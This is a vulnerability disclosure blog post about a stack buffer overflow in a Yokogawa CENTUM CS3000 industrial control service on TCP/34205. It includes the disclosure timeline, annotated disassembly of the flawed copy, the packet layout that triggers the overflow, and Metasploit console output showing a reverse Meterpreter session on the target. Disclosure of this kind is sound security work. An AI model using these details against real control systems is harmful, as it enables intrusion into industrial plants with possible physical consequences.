Last March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product, and disclosed three of the vulnerabilities we found on March 10 on this blog. As noted in the talk, we intended to release information about all of the vulnerabilities we found in the product at the time. Today, after some negotiation with Yokogawa and ICS-CERT, we're disclosing another of the discovered vulnerabilities, in a network service running by default in CENTUM CS3000 installation. The vendor asked for some extra time to assess and address this vulnerability, which is why we ended up with a slightly laggy disclosure schedule this time.
For all of you who weren't able to attend RootedCON, we're going just to quote the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."
The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKESimmgr.exe” service, started automatically on the System startup by default, listens on TCP/34205. By sending a specially crafted packet to the port TCP/34205 it's possible to trigger an stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.
|Dec 27, 2013||Initial disclosure to the vendor, Yokogawa|
|Jan 13, 2014||Disclosure to CERT/CC|
|Jan 14, 2014||CERT/CC assigns VU#479196 and forwards details to JPCERT|
|Feb 03, 2014||CERT/CC confirms JPCERT and ICS-CERT are coordinating the vulnerabilities.
ICS-CERT tracking #: ICS-VU-205881
JPCERT tracking #: JVNVU#98181377, JPECERT#98191377
|March 6, 2014||Yokogawa and ICS-CERT asks for an extension for R7-2013-19.2 (this vulnerability)|
|May 9, 2014||Metasploit module published in Pull Request #3344|
The vulnerability exists in the function sub_409310 (IDA notation). This function tries to extract data (probably strings) from a user sent packet. But the function does an insecure usage of memcpy like function, to copy user controlled data to a static size (64 bytes) stack buffer:
.text:00409360 loc_409360: ; CODE XREF: get_string_sub_409310+42j .text:00409360 mov ecx, 10h .text:00409365 xor eax, eax .text:00409367 lea edi, [esp+50h+var_40] .text:0040936B add esi, edx .text:0040936D rep stosd ; init var_40 with 0x0. .text:0040936F mov ecx, ebx ; The memcpy length comes from user controlled data .text:00409371 lea edi, [esp+50h+var_40] ; destination, var_40 (0x40 bytes buffer) .text:00409375 mov edx, ecx .text:00409377 lea eax, [esp+50h+var_40] .text:0040937B shr ecx, 2 ; divides the size by 4 because it's using rep movsd, where every movsd is for a double word (4 bytes) .text:0040937E rep movsd ; esi pointing to user controlled data from the packet, leading to overflow
The above assembly chunk translates to:
char dst; memset(dst, 0, 64); memcpy(dst, user_data, user_length);
user_length are user controlled values.
It's possible to reach the vulnerable copy function by sending a specially crafted packet to TCP/34205. According to our understanding the packet has the next format:
|Data||Length specified in the header|
Where the header structure is:
|Data Length||2 bytes|
A packet with an identifier 0x1 in the header can be used to trigger the vulnerability. For this packet the data structure is:
|Data Length||2 bytes|
|Data||Data Length bytes|
A packet with “0x1” as Identifier in both the Header and the Data can be used to reach the vulnerable function. The Data Length and Data fields can be used to trigger the buffer overflow.
A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50 running on Windows XP SP3 and Windows 2003 SP2 (DEP bypas), where is possible to gain arbitrary code execution by corrupting the SEH handler stored in the stack:
msf exploit(yokogawa_bkesimmgr_bof) > exploit [*] Started reverse handler on 192.168.172.1:4444 [*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3, sending 427 bytes... [*] Sending stage (770048 bytes) to 192.168.172.192 [*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.192:1048) at 2013-11-17 21:17:14 -0600 meterpreter > getuid Server username: HIS0101\CENTUM meterpreter > sysinfo Computer : HIS0101 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter >
Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.